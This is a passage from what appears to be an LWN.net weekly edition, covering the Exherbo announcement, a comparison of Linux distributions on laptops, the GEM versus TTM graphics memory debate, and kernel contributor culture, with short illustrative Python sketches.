is warranted, it is an interesting extension to the stateless session
cookie scheme.  In his paper, Murdoch mentions some variations that could be used to further
increase the security of the technique.


		Exherbo announced. Sort of...


A new distribution called Exherbo has
announced its
existence.  It's at least partly inspired by Gentoo and has borrowed
some Gentoo code.

  Exherbo is not a Gentoo fork in the conventional sense. Although it
  shares some code with Gentoo, and although many concepts are similar, and
  although many of the people involved were or are Gentoo developers, most
  Exherbo code is rewritten from scratch.


Exherbo is not your average distribution, nor does it aspire to be.  In
fact, Exherbo is not for users at all.  Exherbo is designed to be a
developer's playground.  A place to experiment, to innovate, and to break
packages with impunity.

So far there isn't much there.  The projects page lists only
two projects so far: Arbor, an exheres-format (the Exherbo package format) repository
for base system and assorted useful packages, and Genesis, which aims to be
a replacement init daemon.

There are two mailing
lists available, the main development list and a commit mailing list.
The source repository has
some packages in git and a few more in subversion.  There's a Bugzilla bug tracker too.  So there
isn't much yet, but the infrastructure is there to support what may come.

Perhaps the most interesting part of the site for most people is the Planet Exherbo, a typical blog space
for developers to talk about what they are doing, or would like to do, or
whatever.  For example you'll find this post [warning, site is currently reported by Firefox 3 as an "Attack Site", content can also be found on the Planet site] by Anders Ossowicki which
explains:

  First of all, Exherbo was announced because some elements of it will be
  discussed at an upcoming conference. Rather than having a blank page and
  let people start various rumors it seemed wise to at least let people
  know what was going on. But in an effort not to hype it above what it
  was, we didn't hand over all available information and code.
  
  Unfortunately Slashdot picked up the announcement because some tard
  decided it would be a great idea to submit it to them. We did not do that
  ourselves because, as we state on the website, we have no need for users
  at the moment and exherbo won't fulfill users demands for the foreseeable
  future. That is not to say exherbo won't ever become useful but we're not
  there at the moment. Some very basic things still need to be worked out
  properly.


So there it is.  Do not download and expect a working distribution.  Do not
expect a release of a working distribution any time soon.  But if you are a
developer with an itch to scratch, this might be the place to do so.  Just to
keep it all together, here's the original LWN announcement and all associated
comments.

		The Grumpy Editor's Guide to distributions for laptops


Laptop installation has traditionally been one of the biggest challenges
faced by Linux users.  These systems come with no end of special-purpose
hardware, and they bring particular needs of their own.  More recently,
getting a laptop into a basic, working state has become less of a challenge
- at least, for carefully-chosen systems.  Life has gotten much easier in
this area.

But a contemporary laptop user is not content with "it boots Linux."  A
well-provisioned laptop in 2008 should be able to make full use of all the
hardware, suspend and resume reliably, avoid turning presentations into
extended projector-related hassles, and get the most out of the battery.
Your editor has, in the past, proved that he could get a laptop to suspend
through a sufficient investment of his life into building kernels and
tweaking configurations.  Your editor, in the present, has little patience
for that kind of messing around.  The manual creation of power management
configurations 
should really, at this point, go the way of hand-crafting XFree86
modelines.  Both were once ways of showing one's advanced Linux skills, but
both are now just unnecessary pain.


A period of relatively little travel recently made it possible to follow
through on an old suggestion from Arjan van de Ven: install a number of
distributions on a laptop and compare how they perform.  To this end, your editor's
aging Thinkpad X31 was pressed into service with offerings from several
distributors.  In each case, a recent stable (or occasionally beta)
distribution was installed while doing a minimum of work beyond clicking
"next": no "expert" installations were done.  All available updates were
applied.  Then, a number of things were checked:


 Powertop was installed (if not 
     already present) and run to measure the steady-state power usage of the
     machine.  The laptop was as idle as your editor could get it to be,
     with the backlight at minimum brightness; the system was left long
     enough for the power usage numbers to stabilize.  The idea was to get
     the lowest possible value for each distribution.

 Suspend (to RAM) and hibernate (suspend to disk) were tested.

 Various laptop-specific buttons were tested.  The X31, for example,
     has a button combination which controls a small light which
     illuminates the keyboard.

 The wireless network adapter was tested.  The X31 presents an
     interesting complication in that it has an Atheros-based adapter,
     which, until recently, has not been supportable with free software.

 An external monitor was connected to determine how much work is
     required to drive an external projector.


During the process, any other events of note were recorded as well.

Late in the process of writing this article, your editor was lucky enough
to receive a shiny new HP 2510p laptop, thanks to the generosity of the
folks at HP (and Bdale Garbee in particular).  This machine, being based on
Intel chipsets, is fully supported by free software.  It promises to make
future travels much more pleasant; having a toy like this show up in the
mail makes it hard to maintain a grumpy
attitude.  The above tests were run on the new machine, but only for a
subset of the distributions.

Debian Lenny (unstable testing)

Your editor chose to perform this experiment with a mid-May Debian Lenny
testing release, rather than the aging stable distribution.  That installed
a system with a 2.6.22 kernel which, of course, has no ath5k driver.  So no
wireless on the X31 for Debian users - at least, not without installing the
proprietary MadWifi module.  Unsurprisingly, the Debian installer did not
offer MadWifi as an option.

Suspend works, as long as the user does not mind a corrupted display on
resume; it's possible to see enough to perform an orderly reboot, but not
much more.  It is strange that Debian would have this problem; suspend has
worked on this laptop with kernels significantly older than 2.6.22.
Hibernate was not accessible via its usual place on F12, but, when
invoked from the menus, worked properly.  Other laptop keys worked without
problem. 

The external display port did not work under Debian.  The only way to get
video out of that port is to have the monitor plugged in when the system
boots. 

Power consumption on an idle system was 10.7 watts, with the system waking
up an average of 67 times every second.  This is far from the worst power
performance your editor saw over the course of this exercise, but also far
from the best.

All told, Debian Lenny in its current form is not one of the better
systems for laptops - at least, for this particular laptop.  Some of the
other distributors have made much more progress in this area in recent
years. 

Fedora 9


The installation from the Fedora 9 DVD went without any significant
problems.  One of the nicest things about this particular distribution was
its inclusion of the ath5k driver as part of its 2.6.25 kernel.  It seems
that ath5k does not work well for all chipsets, but the X31 wireless
adapter works quite well with it.  So, with Fedora 9, the X31 laptop
works with 100% free software.

Another thing worthy of note: Fedora 9 was the only distribution tested
which offered to install the system on an encrypted disk.  Given the
frequency with which laptops are lost, encrypting the data on them seems
like something a lot of users would want to have.

Suspend and hibernate worked on this system, with one little glitch: the
backlight remained on after the system was suspended.  Your editor ran into
the same problem with Ubuntu Hardy during its development cycle; after some
conversation in Launchpad, 
the problem was quickly fixed.  So a bug has been filed in the Fedora
tracker pointing to that resolution, but no activity has been seen so far.

The power consumption for Fedora was 8.9 watts, with the processor waking
up an average of 45 times per second.  The NetworkManager applet offers a
"disable wireless" operation which, indeed, will disable the wireless
interface.  It does not power it down, though, so power consumption is
unchanged.  Actually uninstalling the ath5k 
module dropped power consumption to 8.2 watts.

Plugging into an external display worked, though it was necessary to bring
up the "screen resolution" dialog to bring up the external port.

On the 2510p, the display was run in a strange, non-native resolution
during the installation, making the text harder to read.  The installed
system, however, did not have this problem.  This system ran at 11.0 watts,
with a surprising 145 wakeups per second.  Following Powertop's advice,
your editor shut down the Bluetooth interface and the HAL CD polling
daemon, bringing power usage down to 10.1 watts.  Once again,
NetworkManager was unable to save any power by disabling the wireless.  The
hardware's wireless button did power down the interface, bringing power
usage down to 8.6 watts.  But (and this is true for all
distributions tested), NetworkManager was never able to make use of that
interface again until the system was rebooted.


All told, Fedora 9 works quite nicely for laptop installations; this
distribution has made quite a bit of progress over the last few releases.
Some grumpiness about the GNOME setup is appropriate, though.  Fedora's
hackers seem especially enamored of those dialog notifier windows which pop
up from the panel icons.  The experience is rather like trying to work
while being heckled by a sizable crowd of unhelpful bystanders.

One window, in particular, announced that closing the lid would no longer
suspend the system because some (unnamed) program was blocking that
action.  That might be useful information, but knowing which program was
getting in the way would have been more helpful.  But even more helpful
would be to not have to dismiss little notifier windows all the time.

There's also something in the GNOME system on Fedora which feels entitled
to adjust the backlight brightness anytime it thinks that the user has
screwed it up again.  This happens even after the "dim display on idle"
options have been disabled, and often results in making the display
brighter on an idle system.  If the user has set the backlight brightness,
the system should not presume to readjust it.  One should not have to
wrestle with one's computer over the brightness of the display. 


OpenSolaris

Some whim or other inspired your editor to install the OpenSolaris 2008.05
release.  It has been almost ten years since the last encounter with
Solaris, so, perhaps, it was time for a brief reunion.  Brief it was.

The installation procedure for this operating system is textual; it seems
rather primitive next to the effort Linux distributors have been putting
into making their installers attractive.  There is a license acceptance
stage, where the poor user gets to scroll through all of the licenses
applicable to the software in this distribution - 244 licenses in all.
There's no requirement to indicate acceptance, though.

The installed system worked with the Atheros wireless by virtue of a
binary-only driver.  Initially it only worked so well, though; this system,
from Sun "the network is the computer" Microsystems, installs itself configured to
use a local hosts file (only) for hostname lookups.  Your editor had to
manually tweak nsswitch.conf to get it to use DNS.  Sun's equivalent to
NetworkManager is the "network automagic daemon," which is obscure in spots
but seems to work.  There is no power savings to be had from turning off
the wireless interface.

On the power front, once your editor tracked down a Powertop port, the
system was seen to be drawing 11.5 watts.  Unlike with any Linux
distribution, Solaris runs the processor at its fastest speed at all times;
there does not appear to be any concept of CPU frequency control.  The
laptop fan runs constantly under Solaris.

There is no suspend capability, no hibernate.  In general, it would appear
that the Solaris developers have not put a whole lot of effort into the
power management problem so far - at least, not on x86; the OpenSolaris power
management page says that life is better with the Sparc port and that
all this goodness is coming to x86 Real Soon Now.

The external video port did not work at all under OpenSolaris.  Your editor
was charmed to notice that the Solaris folks have retained the classic "log
off now or risk your files being damaged" message in the shutdown
procedure.

On the 2510p, the OpenSolaris CD brought up GRUB, but did not succeed in
booting into the installer.

All told, OpenSolaris has some catching-up to do.  Laptops were almost
certainly not at the top of the priority list for Project Indiana, but it
is still a little discouraging to see how far behind things are.

openSUSE 11.0 Beta 3

The openSUSE development cycle is heading toward its close, so your editor
decided to go with the beta 3 release.  It must be said that this
distribution got off on rather the wrong foot; it puts up an end-user license agreement which prohibits
redistribution for compensation, bundling openSUSE with any other "offering,"
reverse engineering, transfer of the software, use in a production
environment, or publishing benchmark results (but only if you're a software
vendor).  Users are required to stop using the software upon termination of
the license, which happens after 90 days, after the next release, or
whenever Novell says so.  And, just in case one was considering the crime
of using the release for too long:


	The Software may contain an automatic disabling mechanism that
	prevents its use after a certain period of time, so You should back
	up Your system and take other measures to prevent any loss of files
	or data.


There's a certain amount of weasel-wording to the effect that Novell is not
trying to take away any rights conferred by the real licenses on the
software it ships.  So the EULA has little force.  But it is not consistent
with the mores of the community from which Novell took this software, and
it leaves a bad taste in one's mouth.

Installation is relatively straightforward, though a bit more
mouse-intensive than some other distributions.  But one has to watch carefully:
openSUSE, by default, configures the system to automatically log in
the user account created at installation time.  An amusing addition is
that, after suspending and resuming the system (which works), a password
prompt will be presented, even though none is required on a cold boot.

openSUSE, like Fedora, thinks that it's smarter than the user and is
entitled to readjust the backlight at any time.


As mentioned, suspending the system worked without trouble.  Hibernation,
however, failed; it goes straight to resume without halting the system.
openSUSE ships the ath5k driver, so the wireless interface worked
flawlessly with free software.  The external monitor port is always on
under openSUSE; the dialogs offered to create a Xinerama setup, but that
operation failed.


Power consumption was 11.2 watts, with 106 wakeups happening per second.
Your editor noticed that beagled was running, something which was not
observed on other systems.  Powertop noticed too, and politely offered to kill it
off; that brought the system down to 78 wakeups with slightly less power
used.  Removing the ath5k driver brought consumption down to 10.8 watts.


Experience with the 2510p was quite similar.  Hibernate still fails.  Power
usage is a low 9.0 watts; 8.8 when the "kill beagled" option is selected.
Unfortunately, this lower usage is likely to be a result of the wireless
interface not 
working.  NetworkManager is able to present a list of access points, but
does not succeed in associating with any of them.  This is a device with a
free driver, well supported in the 2.6.25 kernel shipped by openSUSE; its
failure to work is discouraging.


Many of the glitches encountered in this distribution are easily explained
by pointing out that it is a beta release.  One can only assume that many
of them will be fixed up before the final version.  With that done,
openSUSE has the potential to be a solid system for laptops; many of the
right pieces are there.  Your editor, though, will have a hard time
considering an openSUSE installation; that unpleasant EULA has left a
lasting impression.


Ubuntu 8.04

Ubuntu made its name partially through its attention to laptop
installations, so your editor had reasonably high expectations from the
"Hardy Heron" long-term-support release.  Those expectations were met, for
the most part.


The installation CD did its job, and the resulting system worked well.  The
Ubuntu time zone selector deserves special mention, though: it tries to pan
the world map under the mouse, with the effect that the target one is
aiming for moves away as one gets close.  It's a video game of sorts, but
it can be a little frustrating, especially with a laptop-style mouse
device. 


Wireless works, but Ubuntu silently installs the MadWifi driver to bring
that about.  Suspend and hibernate work, as do the various Thinkpad
buttons.  Ubuntu demonstrates some of the same backlight obnoxiousness as
the other GNOME-based distributions - but quite a bit less of it.


This system drew 9.5 watts of power, with 47 wakeups per second.  With this
configuration, disabling the wireless in NetworkManager did reduce power
usage considerably - down to 8.1 watts.  It would seem that the MadWifi
driver still knows something about powering down the hardware that ath5k
doesn't.  Even so, removing MadWifi entirely dropped consumption still
further, to 7.8 watts.


On the 2510p, things generally worked well.  Power consumption was 10.1
watts, with an amazing 217 wakeups per second, though.  Part of the problem
here appears to be a bug in the i915 driver which causes it to generate a
steady stream of interrupts if the 3D engine is engaged.  Ubuntu turns on
Compiz by default, causing the video processor to pound on the CPU.
Turning off "visual effects" cut the wakeup rate considerably.  Following
Powertop's advice and disabling the Bluetooth interface as well dropped the
system down to 9.7 watts and 50 wakeups per second.


Concluding notes

Here's a table summarizing some of the results reported above:


The second power number, when present, indicates what is achievable with
minimal tweaking: turning off wireless or letting Powertop shut things
down.  More invasive techniques (unloading modules, for example, or
changing kernel boot parameters) are not
included.

For the 2510p, the results are:


Two other distributions were tried, but did not make it all the way through the
survey process:


 Gentoo.  Playing with Gentoo has been on the list for years.  So an
     install disk was downloaded and your editor launched into the "quick
     install guide."  It is clear that Gentoo employs a rather long
     value of "quick."  This guide prints over many pages, includes 39
     "code listings," requires creating each filesystem by hand, etc.  Your
     editor would still like to play with Gentoo, but there was no time for
     such an exercise now.  Life has gotten too short to go through that
     kind of obstacle course just to get Linux installed on a computer.

 Slackware.  In this case, your editor was able to get through the
     somewhat rustic Slackware 12.1 installation procedure.  It was kind of
     nostalgic to see LILO again.  The system ran, and even brought up the
     window system, but the system would lock hard as soon as your editor
     tried to bring up a terminal window.  That, too, was not the sort of
     experience which had been sought.


What comes out of all this work is that the Linux community now has a few
good options for laptop-friendly distributions.  Getting Linux running well
on a laptop need no longer be an act of advanced wizardry.

That said, there's clearly still room for improvement.  Even well-supported
hardware does not always cooperate well.  For a laptop system, in
particular, it is important to be able to power down unneeded hardware
without having to dig into the system configuration or unload kernel
modules.  If the wireless interface, FireWire port, modem, Bluetooth
interface, etc. are not being used, they should not be drawing power.
After all, if the laptop's user is going to have something to actually
do through a long series of LinuxWorld keynotes, it's important to
stretch that battery as far as possible.  Progress has been made, but there
is more to do.
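
To put the power figures in perspective, a rough calculation may help.  The sketch below assumes a hypothetical 50 watt-hour battery (the capacity is not taken from either laptop) and a constant draw, then converts the first set of Ubuntu measurements reported above into idle runtime.

```python
def runtime_hours(capacity_wh, draw_watts):
    """Idle runtime in hours for a battery of capacity_wh at a constant draw."""
    return capacity_wh / draw_watts

ASSUMED_CAPACITY_WH = 50.0  # hypothetical battery size, for illustration only

# Power draws reported for Ubuntu 8.04 above, in watts.
measurements = {
    "default": 9.5,
    "wireless disabled": 8.1,
    "MadWifi removed": 7.8,
}

for label, watts in measurements.items():
    hours = runtime_hours(ASSUMED_CAPACITY_WH, watts)
    print(f"{label}: {hours:.1f} hours")
```

Under these assumptions, the 1.7-watt difference between the default and the leanest configuration is worth somewhat more than an hour of idle time.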

Your editor must now make a choice as to which distribution will remain on
these laptops.  For the X31, the choice makes itself: Fedora.  It works the
best while installing only free software.  One could retrofit a 2.6.25
kernel into an Ubuntu installation to get the ath5k driver, but it's nicer
to not have to do that.  For the 2510p, the choice is not quite so clear.
It might, in the end, be Ubuntu for the slightly lower power consumption
and fewer backlight hassles.  The potential (not always realized) for
online upgrades might also tip things a little more in the Ubuntu
direction.  All of that will have to be traded off against Fedora's
out-of-the-box encrypted installation, though.
But either Ubuntu or Fedora is a fine choice for this machine;
it is nice to be in a position where there are a couple of high-quality
alternatives.

		GEM v. TTM


Getting high-performance, three-dimensional graphics working under Linux is
quite a challenge even when the fundamental hardware programming
information is available.  One component of this problem is memory
management: a graphics processor (GPU) is, essentially, a computer of its
own with a distinct view of memory.  Managing the GPU's memory - and its
view of system RAM - must be done carefully if the resulting system is
intended to work at all, much less with acceptable performance.


Not that long ago, it appeared that this problem had been solved with the
translation table maps (TTM)
subsystem.  TTM remains outside of the mainline kernel, though, as do
all drivers which use it.  A recent query
about what would be required to get TTM merged led to an interesting
discussion where it turned out that, in fact, TTM may not be the future of
graphics memory management after all.


A number of complaints about TTM have been raised.  Its API is far larger
than is needed for any free Linux driver; it has, in other words, a certain
amount of code dedicated to the needs of binary-only drivers.  The fencing
mechanism (which manages concurrency between the host CPUs and the GPU) is
seen as being complex, difficult to work with, and not always yielding the
best performance.  Heavy use of memory-mapped buffers can create performance
problems of its own.  The TTM API is an exercise in trying to provide for
everything in all situations;  as a result it is, according to some
driver developers, hard to match to
any specific hardware, hard to get started with, and still insufficiently
flexible.  And, importantly, there is a
distinct shortage of working free drivers which use TTM.  So Dave Airlie worries:


	I was hoping that by now, one of the radeon or nouveau drivers
	would have adopted TTM, or at least demoed something working using
	it, this hasn't happened which worries me...  The real question is
	whether TTM suits the driver writers for use in Linux desktop and
	embedded environments, and I think so far I'm not seeing enough
	positive feedback from the desktop side


All of these worries would seem to be moot, since TTM is available and
there is nothing else out there.  Except, as it turns out, there is
something out there: it's called the Graphics Execution Manager, or GEM.
The Intel-sponsored GEM project is all of one month old, as of this writing.
The GEM developers had not really intended to announce
their work quite yet, but the TTM discussion brought the issue to the fore.

Keith Packard's introduction to GEM includes a
document describing the API as it exists so far.  There are a number of
significant differences in how GEM does things.  To begin with, GEM
allocates graphical buffer objects using normal, anonymous, user-space
memory.  That means that these buffers can be forced out to swap when
memory gets tight.  There are clear advantages to this approach, and not
just in memory flexibility: it also makes the implementation of suspend and
resume easier by automatically providing backing store for all buffer
objects.


The GEM API tries to do away with the mapping of buffers into user space.
That mapping is expensive to do and brings all sorts of interesting issues
with cache coherency between the CPU and GPU.  So, instead, buffer objects
are accessed with simple read() and write() calls.  Or,
at least, that's the way it would be if the GEM developers could attach a
file descriptor to each buffer object.  The kernel, however, does not make
the management of that many file descriptors easy (yet), so the real API
uses separate handles for buffer objects and a series of ioctl()
calls. 
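
The shape of that interface can be modeled in a few lines.  The following Python sketch is only a toy: the class and method names are invented for illustration and do not correspond to the actual GEM ioctl() calls.  It shows buffer objects being named by small integer handles, rather than by file descriptors, and accessed through read- and write-style operations instead of a mapping.

```python
class ToyBufferManager:
    """User-space toy model; the real code lives in the kernel behind ioctl()."""

    def __init__(self):
        self._objects = {}
        self._next_handle = 1

    def create(self, size):
        """Allocate a zero-filled buffer object and return its handle."""
        handle = self._next_handle
        self._next_handle += 1
        self._objects[handle] = bytearray(size)
        return handle

    def pwrite(self, handle, offset, data):
        """Copy data into the object at offset, without mapping it."""
        buf = self._objects[handle]
        if offset < 0 or offset + len(data) > len(buf):
            raise ValueError("write outside buffer object")
        buf[offset:offset + len(data)] = data

    def pread(self, handle, offset, length):
        """Copy length bytes out of the object, starting at offset."""
        buf = self._objects[handle]
        if offset < 0 or offset + length > len(buf):
            raise ValueError("read outside buffer object")
        return bytes(buf[offset:offset + length])

    def close(self, handle):
        """Drop the object named by handle."""
        del self._objects[handle]

mgr = ToyBufferManager()
h = mgr.create(4096)
mgr.pwrite(h, 16, b"vertex data")
print(mgr.pread(h, 16, 11))
```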

That said, it is possible to map a buffer object into user space.  But then
the user-space driver must take explicit responsibility for the management
of cache coherency.  To that end there is a set of ioctl() calls
for managing the "domain" of a buffer; the domain, essentially, describes
which component of the system owns the buffer and is entitled to operate on
it.  Changing the domains (there are two, one for read access and one for
writes) of a buffer will perform the necessary cache flushes.  In a sense,
this mechanism resembles the streaming DMA API, where the ownership of DMA
buffers can be switched between the CPU and the peripheral controller.
That is not entirely surprising, as a very similar problem is being solved.
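
A toy model may make the domain idea more concrete.  The Python below is a sketch under simplifying assumptions: it knows about only two owners (CPU and GPU), records cache operations in a list rather than performing them, and uses invented names throughout.  It is not the GEM implementation.

```python
CPU, GPU = "cpu", "gpu"

class ToyBuffer:
    """Toy model of a buffer object's read and write domains."""

    def __init__(self):
        self.read_domain = CPU
        self.write_domain = CPU
        self.cache_ops = []   # record of the cache maintenance performed

    def set_domain(self, read_domain, write_domain=None):
        """Hand the buffer to a new owner, doing any needed cache work."""
        # Data written by the previous owner must be flushed before a
        # different component may look at it.
        if self.write_domain is not None and self.write_domain != read_domain:
            self.cache_ops.append(f"flush {self.write_domain}")
        # A new reader must drop stale cached copies of the buffer.
        if read_domain != self.read_domain:
            self.cache_ops.append(f"invalidate {read_domain}")
        self.read_domain = read_domain
        self.write_domain = write_domain

buf = ToyBuffer()
buf.set_domain(GPU)        # CPU filled it; GPU will now read it
buf.set_domain(GPU)        # no change of ownership, so no cache work
buf.set_domain(CPU, CPU)   # CPU takes it back for writing
print(buf.cache_ops)
```

The point of the design is visible in the second call: when ownership does not change, no cache maintenance is needed, so the cost is paid only on real transitions.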

This API also does away with the need for explicit fence operations.
Instead, a CPU operation which requires access to a buffer will simply
wait, if necessary, for the GPU to finish any outstanding operations
involving that buffer.
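
The effect is that synchronization hides inside the access path.  The following Python sketch imitates that behavior with a thread standing in for the GPU; the names are hypothetical, and the model handles only one outstanding operation per buffer at a time.

```python
import threading
import time

class ToyBuffer:
    """Buffer whose CPU reads wait for simulated GPU work to finish."""

    def __init__(self, size):
        self.data = bytearray(size)
        self._idle = threading.Event()
        self._idle.set()              # no GPU work outstanding

    def gpu_submit(self, work):
        """Start simulated GPU work on this buffer in the background."""
        self._idle.clear()
        def run():
            work(self.data)
            self._idle.set()          # rendering finished
        thread = threading.Thread(target=run)
        thread.start()
        return thread

    def cpu_read(self):
        """Wait for any outstanding GPU work, then return the contents."""
        self._idle.wait()
        return bytes(self.data)

def slow_render(data):
    time.sleep(0.05)                  # pretend the GPU is busy
    data[0] = 42

buf = ToyBuffer(4)
buf.gpu_submit(slow_render)
print(buf.cpu_read()[0])
```

The caller never touches a fence object; the wait happens, if needed, inside cpu_read().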

Finally, the GEM API does not try to solve the entire problem; a number of
important operations (such as the execution of a set of GPU commands) are
left for the hardware-specific driver to implement.  GEM is, thus, quite
specific to the needs of Intel's driver at this time; it does not try for
the same sort of generality that was a goal of TTM.  As described by Eric Anholt:


	The problem with TTM is that it's designed to expose one general
	API for all hardware, when that's not what our drivers want...
	We're trying to come at it from the other direction: Implement one
	driver well.  When someone else implements another driver and finds
	that there's code that should be common, make it into a support
	library and share it.


The advantage to this approach is that it makes it relatively easy to
create something which works well with Intel drivers.  And that may well be
a good start; one working set of drivers is better than none.  On the other
hand, that means that a significant amount of work may be required to get
GEM to the point where it can support drivers for other hardware.  There
seem to be two points of view on how that might be done: (1) add
capabilities to GEM when needed by other drivers, or (2) have each
driver use its own memory manager.


The first approach is, in many ways, more pleasing.  But it implies that
the GEM API could change significantly over time.  And that, in turn, could
delay the merging of the whole thing; the GEM API is exported to user
space, and, as a result, must remain compatible as things change.  So there
may be resistance to a quick merge of an API which looks like it may yet
have to evolve for some time.  

The second approach, instead, is best described by Dave Airlie:


	Well the thing is I can't believe we don't know enough to do this
	in some way generically, but maybe the TTM vs GEM thing proves its
	not possible.  So we can then punt to having one memory manager per
	driver, but I suspect this will be a maintenance nightmare, so if
	people decide this is the way forward, I'm happy to see it
	happen. However the person submitting the memory manager n+1 must
	damn well be willing to stand behind the interface until time ends,
	and explain why they couldn't re-use 1..n memory managers.


One other remaining issue is performance.  Keith Whitwell posted some benchmark results showing that the
i915 driver performs significantly worse with either TTM or GEM than
without.  Keith Packard gets different
results, though; his tests show that the GEM-based driver is significantly
faster.  Clearly there is a need for a set of consistent benchmarks;
performance of graphics drivers is important, but performance cannot be
optimized if it cannot be reliably measured.


The use of anonymous memory also raises some performance concerns: a
first-person shooter game will not provide the same experience if its
blood-and-gore textures must be continually paged in.  Anonymous memory can
also be high memory, and, thus, not necessarily accessible via a 32-bit
pointer.  Some GPU hardware cannot address high memory; that will likely
force the use of bounce buffers within the kernel.  In the end, GEM will
have to prove that it can deliver good performance; GEM's developers are
highly motivated to make their hardware look good, so there is a reasonable
chance that things will work out on this front.


The conclusion to draw from all of this is that the GPU memory management
problem cannot yet be considered solved.  GEM might eventually become that
solution, but it is a very new API which still needs a fair amount of
work.  There is likely to be a lot of work yet to be done in this area.


(Thanks to Timo Jyrinki for suggesting this topic.)

		Getting the right kind of contributions


Most free software projects encourage contributors—it is the rare
project that has an overabundance—but contributions vary
greatly in quality.  Encouraging good submissions, or those likely to lead
to useful contributions down the road, is an important part of any
project.  But it is a delicate balance.  It can be difficult to determine
the kinds of tasks suitable for new contributors that will lead to more important
contributions later.


The flip side of that coin is how to handle contributions that appear to
lead elsewhere.  Just wading through the significant submissions on a large
project's mailing list—linux-kernel being an excellent
example—is extremely time consuming; adding noise, in the form of
less-than-completely-useful patches, only makes that job harder.   New
contributors generally want to start with something relatively easy,
though, which leads to the tension.


Discouraging patches that aren't particularly useful in a way that won't
chase off prospective kernel hackers is hard.  Al Viro's rather intemperate
call for discussion of a linux-wanking mailing
list on linux-kernel is probably not the right approach.  He was responding to a patch
that reformatted a kernel header file to 
line up the arguments.  Viro is not known for his diplomatic skills, but he
was responding to a problem that he and other kernel hackers see.  There is
an increasing amount of trivial cleanup work being submitted that is not translating to
more substantial, useful contributions later on.


In a followup post, 
Viro explains his concern:

We are getting another self-contained area.  Namely, "pick a
pointless mechanical work out of ever-growing pile, do it, learn nothing,
pick more, maybe look into finding new classes of such mindless stuff".
Of course it always had been there; what changes is that now it's not
just a transient state one might hit on the way in to be slightly
embarrassed
about years later.  It gets more visible, it gets self-sustained and it
gets more and more sticky - it became a subculture in its own right and
as far as I can see it is offering more and more incentives to stay in it
instead of moving on.


There is a real cost associated with posts to linux-kernel.  It is the main
communication mechanism for kernel development so those involved need to
work through the posts there.  David Miller laments the time he spends sorting through it
all: 

After deleting all of the noise posted here, I'm often too burnt out
to do real work with what's left and just delete that too. :-/
It's worse than the postmaster and list owner mail I process each
day for vger.kernel.org

Wouldn't you like me to instead have the energy left to review some
useful patches?


The kernel project provides a number of resources for people who are
interested in getting involved but don't know where and how to start.  The
Kernel Newbies effort is
specifically designed to help people get started with the kernel by
running a wiki, mailing list, and IRC channel that are focused on the needs
of, well, newbies.  The idea is to provide information and mentoring that
will lead to useful contributions to the kernel.


One subproject is the Kernel
Janitors, who focus on cleaning up kernel code:

We go through the Linux kernel source code, doing code reviews, fixing up
unmaintained code and doing other cleanups and API conversions. It is a
good start to kernel hacking. 


Both of these efforts are targeted at getting people up to speed so that
the kernel as a whole improves.  All of the work is important, but there
are many other kernel tasks that are not getting done, possibly because
contributors are concentrating on cleanups.  Andrew Morton has some suggestions for interested folks:

One could understand a developer deciding to write a do-nothing
whitespace patch as a general throat-clearing exercise, but when asked,
I recommend against that.  I generally recommend that people just
download and test the latest -rc, linux-next and -mm kernels and build
and run them.  Because they surely will find things which need fixing.
Often simple little things like compilation errors, sometimes things
which need a bisection search.


One problem, though, is that much of that work is more difficult than a
whitespace cleanup.  For those who are interested in getting their name "up
in lights"—in the form of a kernel commit message—the trivial
patch path appears easier.  Responses like Viro's may deter them, but they
risk making linux-kernel look like a hostile place that does not encourage
new developers.


Some extremely important kernel tasks often get little or no
recognition.  Submitting detailed bug reports, bisecting the kernel to find
the patch that broke things, or testing proposed fixes go
unrecognized—at least in the kernel commit log.  There have been
thoughts of adding tags to the patches that would note these contributions,
but no concrete proposal has been made.
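
For readers unfamiliar with the bisection mentioned above, the idea is an ordinary binary search over the commit history.  The Python sketch below uses made-up commit names and a stand-in test function; it assumes that the first commit is good, the last is bad, and that the bug, once introduced, stays.

```python
def first_bad(commits, is_bad):
    """Return the first commit for which is_bad() is true.

    Assumes commits are in chronological order, commits[0] is good,
    commits[-1] is bad, and every commit after the first bad one is bad.
    """
    lo, hi = 0, len(commits) - 1   # commits[lo] is good, commits[hi] is bad
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if is_bad(commits[mid]):
            hi = mid
        else:
            lo = mid
    return commits[hi]

# Hypothetical history of 1000 commits in which c638 introduced the bug.
commits = [f"c{i}" for i in range(1, 1001)]
tests_run = 0

def is_bad(commit):
    """Stand-in for building and booting a kernel at this commit."""
    global tests_run
    tests_run += 1
    return int(commit[1:]) >= 638

print(first_bad(commits, is_bad), "found after", tests_run, "tests")
```

Each test halves the range of suspects, which is why a regression hidden among a thousand commits can be located with roughly ten kernel builds.  The git bisect command automates the same search over real history.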


Two other documentation efforts are underway to assist new kernel
developers.  Jesper Juhl is working on a Kernel
Newbies Guide to be included into the kernel Documentation
tree.  It may get folded into Documentation/HOWTO or added as a separate
file, but the idea is to steer folks in the right direction—and away
from the kinds of patches that raise the ire of kernel hackers.  LWN's
Jonathan Corbet also mentioned a longer
document he is working on with support from the Linux Foundation that should
be ready for review in June.  


There may be some rudeness or hostility towards new developers on linux-kernel, but it rarely
rises to the level seen on the openbsd-misc mailing list last October.  In
response to a query about a list of less complicated tasks for
OpenBSD—similar to what the Linux Kernel Janitors
maintain—project leader Theo de Raadt, who is really not noted
for his diplomacy, blasts:

Surely they are too busy whining at us for lists, to actually search
for the lists.

I'll say it again more clearly -- all of you whiners just plain suck.
We know you'll never write diffs, and it is up to you to prove us
wrong.  If you don't write diffs, we have a difficult time feeling any
loss.


This is sort of the extreme end of the "show us the code" attitude, but, in
his own inimitable way, de Raadt is reacting to the same problem.  It takes
time and effort to shepherd new kernel hackers.  Spending time mentoring
folks who will never end up contributing is a waste; that time is better
spent finding and fixing bugs.  As Linux hacker Ted Ts'o puts it:

The real question is whether people who are wanking about whitespace
and spelling fixes in comments will graduate to writing real, useful
patches.  If they won't, there's no point to encouraging them.


How does a project determine which newly interested people will end up
being useful contributors versus those that will not?  It is a difficult
problem that warrants some thought.  It surely isn't just kernel projects
that have it, as any large, high-profile project will have both a fairly
high barrier to entry and some developers who should be
discouraged.


Obviously there will never be a
clear-cut "future contributor" test, but there may be ways to get a better
idea.  In the meantime, flaming well-meaning folks to a crisp is unlikely
to get there.  Referring
inappropriate patches to Kernel Newbies or something similar, on the
off chance the person can be redirected, might be a start.


		The Grumpy Editor reviews Claws Mail


The Grumpy Editor's guide to
graphical email clients was published almost exactly four years ago.
At that time, your editor was looking for a client which could replace an
MH-based setup which, for all its age, provided a degree of speed and
flexibility which was hard to match.  Your editor gets a lot of mail - even
